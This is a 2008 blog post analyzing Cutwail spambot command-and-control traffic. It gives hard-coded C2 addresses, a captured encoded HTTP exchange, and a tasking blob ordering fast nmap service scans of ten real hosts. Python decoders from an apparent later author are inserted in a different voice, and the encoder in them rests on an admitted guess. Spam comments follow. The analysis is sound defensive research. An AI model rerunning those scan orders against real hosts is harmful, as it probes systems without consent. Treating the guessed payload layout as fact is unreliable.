A little Cutwail spambot analysis on network traffic

Recently, while analyzing the network traffic of a Cutwail binary (a spambot commonly installed by a trojan of the Pushdo family), I found some interesting behavior in its command-and-control communication. Although I expected encrypted HTTP communication on port 4080, as stated in the recent research on the TOP Spam Botnets from April 2008, I found a completely different setup. First, there were over a dozen backend nodes (motherships), all in the 216.195.[52-63] range. Analyzing the binary revealed more hard-coded IP addresses in Russia and the US:

78.109.30.80
78.109.30.64
78.109.30.56
78.109.30.48
78.109.30.24
78.109.30.32
78.109.30.16
78.109.29.240
78.109.29.232
78.109.30.8
216.195.63.18
216.195.57.116
208.71.130.48
208.71.130.144
216.195.63.19
216.195.63.20
216.195.63.25
216.195.63.36
216.195.56.250
216.195.56.251
216.195.57.125
216.195.63.21
216.195.63.22
216.195.63.23
216.195.63.24
216.195.52.17
216.195.52.18
216.195.52.157

Moreover, the traffic was not completely encrypted, and none of it was on port 4080/tcp. The ports in use were 7230/tcp (encrypted), 8195/tcp (encrypted), 8001/tcp (plain), 3078/tcp (plain) and 3128/tcp (plain, with a base64-encoded HTTP payload representing IP addresses in decimal form, for whatever reason; see below). Again, the data shown is not sanitized or censored in any way.

POST / HTTP/1.1
Accept: */*
Accept-Language: en
Cache-Control: no-cache
Pragma: no-cache
Accept-Charset: iso-8859-1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 216.195.55.10:3128
Content-Length: 85
Connection: Keep-Alive

data=5NIkrmdE9mkmNhBBD+yxLNZAUjtwQNC0uO4Gxf17PH6RUuBFmKfWGzYC6IecvQ3INDLDOEaJlyr37hwE

HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Cache-Control: no-cache
Date: Fri, 29 Aug 2008 19:23:32 GMT
Last-Modified: Fri, 29 Aug 2008 19:23:32 GMT
Server: Apache/1.3.35 (Unix) PHP/4.4.2
Content-Length: 110

{NTQx9k+dqZV6afQgf2ABxEjDK5OPtU2/XPa8nj4GndeDqESDAmD0XeGBu1SS7ux0pL9vTIIFzqeYtyMXbJQMOZxHIz2ZaBBWFnttDXrlUcp=}.
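To make the port 3128 channel concrete, here is an added example (my own code, not anything from the post or from the Cutwail binary) of what "base64-encoded payload carrying IP addresses in decimal" means and how a defender can pull such addresses back out of a captured request. The exact layout of the real payload is not on the page, so the encoder is an assumption: one 32-bit decimal integer per line, base64-wrapped into a `data=` form field. The decoder also tolerates dotted quads in case the integers turn out to be per-octet. One practical caveat built in: the captured value contains `+`, so the field is extracted with a regex rather than a form parser, which would turn `+` into a space and break the base64.

```python
import base64
import ipaddress
import re


def ip_to_decimal(addr: str) -> int:
    """Dotted-quad IPv4 address -> 32-bit integer (the "decimal" form)."""
    return int(ipaddress.IPv4Address(addr))


def decimal_to_ip(n: int) -> str:
    """32-bit integer -> dotted-quad IPv4 address."""
    return str(ipaddress.IPv4Address(n))


def encode_payload(addrs):
    """Constructed encoder (an assumption, not Cutwail's real layout):
    one decimal IP per line, base64-encoded for the data= form field."""
    body = "\n".join(str(ip_to_decimal(a)) for a in addrs)
    return base64.b64encode(body.encode("ascii")).decode("ascii")


def extract_data_field(http_body: str) -> str:
    """Pull the base64 text out of 'data=...' WITHOUT a form decoder:
    urllib.parse.parse_qs would turn '+' into a space and corrupt the
    base64 alphabet (the captured payload above does contain '+')."""
    m = re.search(r"(?:^|&)data=([A-Za-z0-9+/=]+)", http_body)
    if m is None:
        raise ValueError("no data= field in body")
    return m.group(1)


def decode_payload(payload: str):
    """base64-decode the field and recover IPv4 addresses from it.
    Dotted quads are returned as-is; otherwise every integer that fits
    in 32 bits is treated as a decimal-form address."""
    raw = base64.b64decode(payload, validate=True).decode("ascii", errors="replace")
    dotted = re.findall(r"\b\d{1,3}(?:\.\d{1,3}){3}\b", raw)
    if dotted:
        return dotted
    addrs = []
    for tok in re.findall(r"\d+", raw):
        n = int(tok)
        if n <= 0xFFFFFFFF:
            addrs.append(decimal_to_ip(n))
    return addrs


if __name__ == "__main__":
    # Constructed sample: two of the hard-coded motherships from the list above.
    sample = encode_payload(["216.195.63.18", "78.109.30.80"])
    body = "data=" + sample
    print(body)
    print(decode_payload(extract_data_field(body)))
```

Pointed at real captures, the decoder is only as good as the layout assumption; if the decoded text does not yield plausible addresses, the integers are probably framed differently and the encoder side needs adjusting first.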

Moreover, I found that the bots tried to automatically create Hotmail accounts using an XML template previously provided by a mothership. I uploaded the template for the interested reader. This template walks through the Hotmail signup form and is apparently also able to break CAPTCHAs. Furthermore, one bot additionally downloaded nmap and received instructions from a mothership containing nmap options and IP addresses:

.{....+\....-T5 -sV.128.194.136.173.53,80...+\....-T5 -sV.128.194.136.147.53,80...+\....-T5 -sV.128.194.137.81.53,80...+\....-T5 -sV.128.194.137.101.53,80...+\....-T5 -sV.128.194.136.240.53,80...+\....-T5 -sV.128.194.137.16.53,80...+\....-T5 -sV.128.194.137.136.53,80...+\....-T5 -sV.128.194.137.95.53,80...+\....-T5 -sV.128.194.137.35.53,80...+\....-T5 -sV.128.194.137.42.53,80.

Option -sV: Probe open ports to determine service/version info
Option -T5: Set timing template (higher is faster) <– 5 is the highest
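The scan tasking above is worth extracting systematically, because it tells a defender which networks the botnet was told to probe and therefore who should be notified and what to watch for in flow data. The following is an added example of my own, not code from the post; it takes the blob exactly as printed (assuming each `.` stands for one non-printable byte the capture tool could not display), pulls out every option/target/port triple, and summarizes the targeted /24 networks.

```python
import ipaddress
import re

# The task blob exactly as printed in the post; '.' stands for the
# non-printable bytes the capture tool could not display (assumption).
TASK_BLOB = (
    r".{....+\....-T5 -sV.128.194.136.173.53,80...+\....-T5 -sV.128.194.136.147.53,80"
    r"...+\....-T5 -sV.128.194.137.81.53,80...+\....-T5 -sV.128.194.137.101.53,80"
    r"...+\....-T5 -sV.128.194.136.240.53,80...+\....-T5 -sV.128.194.137.16.53,80"
    r"...+\....-T5 -sV.128.194.137.136.53,80...+\....-T5 -sV.128.194.137.95.53,80"
    r"...+\....-T5 -sV.128.194.137.35.53,80...+\....-T5 -sV.128.194.137.42.53,80."
)

TASK_RE = re.compile(
    r"(-[A-Za-z0-9]+(?: -[A-Za-z0-9]+)*)"  # nmap options, e.g. "-T5 -sV"
    r"\."                                  # one unprintable separator byte
    r"(\d{1,3}(?:\.\d{1,3}){3})"           # target IPv4 address
    r"\."                                  # separator
    r"(\d+(?:,\d+)*)"                      # comma-separated port list
)


def parse_scan_tasks(blob: str):
    """Return one dict per tasking entry: options, target, ports."""
    tasks = []
    for m in TASK_RE.finditer(blob):
        opts, target, ports = m.groups()
        tasks.append({
            "options": opts,
            "target": target,
            "ports": [int(p) for p in ports.split(",")],
        })
    return tasks


def summarize(tasks):
    """Collapse the tasking into what a defender would report: the option
    strings used, the ports probed, the /24 networks hit and how many
    distinct hosts were named."""
    nets = {str(ipaddress.ip_network(t["target"] + "/24", strict=False))
            for t in tasks}
    ports = {p for t in tasks for p in t["ports"]}
    opts = {t["options"] for t in tasks}
    return {
        "options": sorted(opts),
        "ports": sorted(ports),
        "networks": sorted(nets),
        "targets": len({t["target"] for t in tasks}),
    }


if __name__ == "__main__":
    tasks = parse_scan_tasks(TASK_BLOB)
    for t in tasks:
        print(t)
    print(summarize(tasks))
```

The summary for this blob is ten hosts in 128.194.136.0/24 and 128.194.137.0/24, all probed on 53 and 80 with the fastest timing template and version detection; the same parser can be run over any later tasking the bot receives, and a sudden appearance of `-sV` jobs in a spambot's C&C stream is itself a useful alert condition.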

As can be seen, control of the botnet in the background is done via pretty diverse channels. Of course, one major task of the bot is still spamming; this short analysis, however, concentrated on its C&C, using binaries from July/August 2008. Note that this study might not be up to date any more by now…

17 Responses to “A little Cutwail spambot analysis on network traffic”

  1. Cutwail and Rustock/Costrat: Same backend mothership(s)? | BjOG - Bjou's Blog, that is! Says:

    [...] I posted an analysis of Cutwail, today, while analyzing a Rustock/Costrat binary, I found something [...]

  2. Bredolab Gearing Up to Spam the Web | Fortinet FortiGuard Blog Says:

    [...] social network creation / spamming, even domain registration. There was an old web engine (Imrabot) used by Pushdo back in 2008 – but it is not as capable as Webwail, and seems to have been a predecessor that was not [...]

  3. Lamar Scamehorn Says:

    Good stuff! I’m satisfied to see the new structure on your weblog urls.

  4. Elda Patricia Says:

    I don’t usually reply to posts but I’ll in this situation.
    My God, I believed you were going to chip in with some decisive insight on the finish there, not depart it
    with ‘we depart it to you to decide’.

  5. Tommy Lucatero Says:

    I don’t totally determine your view, but I get the point.

  6. Carmine Halseth Says:

    I absolutely love your blog and find many of your posts to be what precisely I’m looking for. Can you offer guest writers to write content available for you? I wouldn’t mind producing a post or elaborating on a number of the subjects you write in relation to here. Again, awesome blog!

  7. Scholarships for Women Over 40 Says:

    don’t ask don’t tell…

    [...]listed here are a couple of hyper-links to internet pages which I connect to as we think they will be truly worth checking out[...]…

  8. Pierre Klaman Says:

    This wasn’t quite clean.

  9. aquarius horoscope 2011 Says:

    I’ll immediately take hold of your rss feed as I can not find your e-mail subscription link or newsletter service. Do you’ve any? Kindly let me understand in order that I may subscribe. Thanks.

  10. Darrell Falencki Says:

    I keep listening to the news broadcast speak about getting boundless online grant applications so I have been looking around for the finest site to get one. Could you tell me please, where could I get some?

  11. reverse lookup canada Says:

    This article is an example of writing by someone who really cares about their content. I wish I could find more good reading like this online, but not all writers care as much as you.

  12. Familieneinladungen Blog Says:

    Howdy, I’ll be so bold as to post something on your blog. Everything actually looks quite reasonable! At the moment I’m also busy with the topic of my own Wordpress blog, but I’m still looking for a suitable design and browsing a few Wordpress blogs where I might find something suitable as inspiration! Regards

  13. Ward Hornaday Says:

    You are really a good webmaster. The website loading speed is amazing. It seems that you’re doing some unique trick. Furthermore, the contents are masterpiece. You have done an excellent job on this topic!

  14. Quentin Sbano Says:

    You’re so cool! I don’t suppose I’ve read something like this before. So good to search out anyone with some authentic ideas on this subject. Really thank you for beginning this up. This website is one thing that is wanted on the web, someone with a bit of originality. Useful job for bringing one thing new to the web!

  15. Fahrzeugentsorgung kostenlos Says:

    Hi there, simply changed into alert to your weblog through Google, and found that it’s truly informative. I am gonna watch out for brussels. I’ll be grateful in case you proceed this in future. Numerous people will probably be benefited out of your writing. Cheers!

  16. Professor Joseph Chikelue Obi Says:

    Appreciating the time and energy you put into your blog and in depth information you provide. It’s nice to come across a blog every once in a while that isn’t the same old rehashed information. Great read! I’ve saved your site and I’m adding your RSS feeds to my Google account.

  17. Loree Mani Says:

    I believe this is one of the most significant information for me. And I’m glad reading your article. However wanna commentary on some basic issues, the website style is great, the articles are actually excellent : D. Good process, cheers
